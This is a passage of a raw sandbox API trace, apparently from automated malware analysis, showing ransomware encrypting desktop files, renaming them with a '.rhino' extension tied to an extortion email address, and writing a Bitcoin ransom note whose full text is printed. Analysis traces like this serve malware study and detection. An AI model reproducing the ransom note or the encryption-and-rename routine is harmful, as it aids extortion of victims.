RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eba00 [0081.260] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f69c8 | out: hHeap=0x6d0000) returned 1 [0081.260] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0081.260] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eba00 | out: hHeap=0x6d0000) returned 1 [0081.260] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tjRtep--W8 SqtmSnaj\\GfH 1Ie6wOQzY 5k4DI.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tjrtep--w8 sqtmsnaj\\gfh 1ie6woqzy 5k4di.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0081.261] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x4af30c | out: lpFileSizeHigh=0x4af30c*=0x0) returned 0x3259 [0081.261] LockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x3379, nNumberOfBytesToLockHigh=0x0) returned 1 [0081.261] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.261] ReadFile (in: hFile=0x124, lpBuffer=0x4af2cc, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x4af2cc*, lpNumberOfBytesRead=0x4af2ac*=0x20, lpOverlapped=0x0) returned 1 [0081.263] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.263] ReadFile (in: hFile=0x124, lpBuffer=0x3110040, nNumberOfBytesToRead=0x3259, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x3110040*, lpNumberOfBytesRead=0x4af2ac*=0x3259, lpOverlapped=0x0) returned 1 [0081.263] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5760 [0081.263] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0081.263] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x715080 [0081.263] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e6b00 [0081.263] GetLastError () returned 0x0 [0081.264] SetLastError (dwErrCode=0x0) [0081.264] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0081.264] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x327c) returned 0x6ee498 [0081.264] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0081.264] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x703e78 [0081.264] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x703f80 [0081.264] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0081.264] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.264] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x6f5760 [0081.264] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x6f5750 [0081.264] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0081.264] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x6f5760 [0081.264] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0081.264] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5750 [0081.264] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0081.264] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x6f5760 [0081.265] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0081.265] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x714188 [0081.265] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0081.265] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x714170 [0081.265] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714188 | out: hHeap=0x6d0000) returned 1 [0081.265] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709f08 [0081.265] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714170 | out: hHeap=0x6d0000) returned 1 [0081.265] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x713d48 [0081.265] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709f08 | out: hHeap=0x6d0000) returned 1 [0081.265] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x715080 [0081.265] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713d48 | out: hHeap=0x6d0000) returned 1 [0081.265] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e6b00 [0081.265] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0081.265] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6f36d0 [0081.265] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0081.265] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x703e78 [0081.265] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0081.265] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x721c20 [0081.265] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0081.266] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x721d00 [0081.266] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0081.266] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x714b90 [0081.266] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721d00 | out: hHeap=0x6d0000) returned 1 [0081.266] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x721c20 [0081.266] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714b90 | out: hHeap=0x6d0000) returned 1 [0081.266] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x75b0d8 [0081.266] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0081.266] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x6f45b8 [0081.266] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75b0d8 | out: hHeap=0x6d0000) returned 1 [0081.266] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x715898 [0081.266] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f45b8 | out: hHeap=0x6d0000) returned 1 [0081.266] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x716200 [0081.266] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715898 | out: hHeap=0x6d0000) returned 1 [0081.266] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x717018 [0081.266] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x716200 | out: hHeap=0x6d0000) returned 1 [0081.266] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x744cd8 [0081.266] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717018 | out: hHeap=0x6d0000) returned 1 [0081.271] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x715898 [0081.271] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x744cd8 | out: hHeap=0x6d0000) returned 1 [0081.271] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x744cd8 [0081.272] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715898 | out: hHeap=0x6d0000) returned 1 [0081.272] WriteFile (in: hFile=0x124, lpBuffer=0x744ce0*, nNumberOfBytesToWrite=0x3379, lpNumberOfBytesWritten=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x744ce0*, lpNumberOfBytesWritten=0x4af2ac*=0x3379, lpOverlapped=0x0) returned 1 [0081.273] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x744cd8 | out: hHeap=0x6d0000) returned 1 [0081.273] UnlockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x3379, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0081.273] CloseHandle (hObject=0x124) returned 1 [0081.351] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9730 [0081.351] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x106) returned 0x721c20 [0081.351] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9730 | out: hHeap=0x6d0000) returned 1 [0081.351] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tjRtep--W8 SqtmSnaj\\GfH 1Ie6wOQzY 5k4DI.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tjrtep--w8 sqtmsnaj\\gfh 1ie6woqzy 5k4di.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tjRtep--W8 SqtmSnaj\\GfH 1Ie6wOQzY 5k4DI.png.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tjrtep--w8 sqtmsnaj\\gfh 1ie6woqzy 5k4di.png.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0081.390] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0081.390] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703f80 | out: hHeap=0x6d0000) returned 1 [0081.390] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee498 | out: hHeap=0x6d0000) returned 1 [0081.390] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eba00 [0081.390] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6970 | out: hHeap=0x6d0000) returned 1 [0081.390] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eb8f0 [0081.390] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x6f36d0 [0081.390] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eb8f0 | out: hHeap=0x6d0000) returned 1 [0081.390] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tjRtep--W8 SqtmSnaj\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tjrtep--w8 sqtmsnaj\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0081.391] lstrlenA (lpString="All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail:\n1)generalchin@countermail.com\n2)generalchin@smime.ninja (if you do not receive a response from the first mailbox)\n\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us.\nAfter payment we will send you the decryption tool that will decrypt all your files.\n\nFree decryption as guarantee\nBefore paying you can send us up to 1 files for free decryption.\nThe total size of files must be less than 500 Kb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\n") returned 676 [0081.391] WriteFile (in: hFile=0x124, lpBuffer=0x279dd0*, nNumberOfBytesToWrite=0x2a4, lpNumberOfBytesWritten=0x4af304, lpOverlapped=0x0 | out: lpBuffer=0x279dd0*, lpNumberOfBytesWritten=0x4af304*=0x2a4, lpOverlapped=0x0) returned 1 [0081.393] CloseHandle (hObject=0x124) returned 1 [0081.393] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0081.393] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tjRtep--W8 SqtmSnaj\\q5Hr7lyiRfCApU6C.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tjrtep--w8 sqtmsnaj\\q5hr7lyirfcapu6c.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0081.393] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x4af30c | out: lpFileSizeHigh=0x4af30c*=0x0) returned 0x126e0 [0081.393] LockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x12800, nNumberOfBytesToLockHigh=0x0) returned 1 [0081.393] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.393] ReadFile (in: hFile=0x124, lpBuffer=0x4af2cc, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x4af2cc*, lpNumberOfBytesRead=0x4af2ac*=0x20, lpOverlapped=0x0) returned 1 [0081.395] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.395] ReadFile (in: hFile=0x124, lpBuffer=0x3110040, nNumberOfBytesToRead=0x126e0, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x3110040*, lpNumberOfBytesRead=0x4af2ac*=0x126e0, lpOverlapped=0x0) returned 1 [0081.396] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5760 [0081.396] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0081.396] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x715080 [0081.396] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e6b00 [0081.396] GetLastError () returned 0x0 [0081.397] SetLastError (dwErrCode=0x0) [0081.397] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0081.397] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x12703) returned 0x744cd8 [0081.398] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0081.398] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x703e78 [0081.398] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x703f80 [0081.398] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0081.398] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.398] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x6f5760 [0081.398] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x6f5750 [0081.398] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0081.398] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x6f5760 [0081.399] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0081.399] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5750 [0081.399] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0081.399] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x6f5760 [0081.399] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0081.399] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x714170 [0081.399] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0081.399] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x714188 [0081.399] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714170 | out: hHeap=0x6d0000) returned 1 [0081.399] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709f08 [0081.399] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714188 | out: hHeap=0x6d0000) returned 1 [0081.399] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x713d48 [0081.399] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709f08 | out: hHeap=0x6d0000) returned 1 [0081.399] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x715080 [0081.399] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713d48 | out: hHeap=0x6d0000) returned 1 [0081.399] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e6b00 [0081.399] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0081.399] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6f36d0 [0081.399] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0081.399] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x703e78 [0081.399] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0081.399] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x721c20 [0081.400] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0081.400] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x721d00 [0081.400] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0081.400] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x714b90 [0081.400] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721d00 | out: hHeap=0x6d0000) returned 1 [0081.400] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x721c20 [0081.400] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714b90 | out: hHeap=0x6d0000) returned 1 [0081.400] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x75b0d8 [0081.400] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0081.400] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x6f45b8 [0081.400] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75b0d8 | out: hHeap=0x6d0000) returned 1 [0081.400] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x717898 [0081.400] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f45b8 | out: hHeap=0x6d0000) returned 1 [0081.400] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x718200 [0081.400] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717898 | out: hHeap=0x6d0000) returned 1 [0081.400] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x6ee498 [0081.400] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x718200 | out: hHeap=0x6d0000) returned 1 [0081.401] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x6ef9d8 [0081.401] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee498 | out: hHeap=0x6d0000) returned 1 [0081.401] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x7573e8 [0081.401] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef9d8 | out: hHeap=0x6d0000) returned 1 [0081.401] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x2230048 [0081.402] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7573e8 | out: hHeap=0x6d0000) returned 1 [0081.402] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x2234798 [0081.403] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x2230048 | out: hHeap=0x6d0000) returned 1 [0081.403] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x223b278 [0081.404] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x2234798 | out: hHeap=0x6d0000) returned 1 [0081.404] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x7630c0 [0081.407] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x223b278 | out: hHeap=0x6d0000) returned 1 [0081.408] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1682d) returned 0x2230048 [0081.408] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7630c0 | out: hHeap=0x6d0000) returned 1 [0081.408] WriteFile (in: hFile=0x124, lpBuffer=0x2230060*, nNumberOfBytesToWrite=0x12800, lpNumberOfBytesWritten=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x2230060*, lpNumberOfBytesWritten=0x4af2ac*=0x12800, lpOverlapped=0x0) returned 1 [0081.408] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x2230048 | out: hHeap=0x6d0000) returned 1 [0081.408] UnlockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x12800, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0081.408] CloseHandle (hObject=0x124) returned 1 [0081.416] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x6f36d0 [0081.416] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf0) returned 0x703e78 [0081.416] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0081.416] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tjRtep--W8 SqtmSnaj\\q5Hr7lyiRfCApU6C.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tjrtep--w8 sqtmsnaj\\q5hr7lyirfcapu6c.xls"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tjRtep--W8 SqtmSnaj\\q5Hr7lyiRfCApU6C.xls.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tjrtep--w8 sqtmsnaj\\q5hr7lyirfcapu6c.xls.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0081.417] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0081.417] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703f80 | out: hHeap=0x6d0000) returned 1 [0081.417] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x744cd8 | out: hHeap=0x6d0000) returned 1 [0081.417] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eb8f0 [0081.417] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eba00 | out: hHeap=0x6d0000) returned 1 [0081.417] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eba00 [0081.417] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x6f36d0 [0081.417] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eba00 | out: hHeap=0x6d0000) returned 1 [0081.417] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tjRtep--W8 SqtmSnaj\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tjrtep--w8 sqtmsnaj\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0081.417] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0081.417] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tjRtep--W8 SqtmSnaj\\X2JajLRX6.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tjrtep--w8 sqtmsnaj\\x2jajlrx6.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0081.418] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x4af30c | out: lpFileSizeHigh=0x4af30c*=0x0) returned 0x129e5 [0081.418] LockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x12b05, nNumberOfBytesToLockHigh=0x0) returned 1 [0081.418] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.418] ReadFile (in: hFile=0x124, lpBuffer=0x4af2cc, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x4af2cc*, lpNumberOfBytesRead=0x4af2ac*=0x20, lpOverlapped=0x0) returned 1 [0081.420] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.420] ReadFile (in: hFile=0x124, lpBuffer=0x3110040, nNumberOfBytesToRead=0x129e5, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: 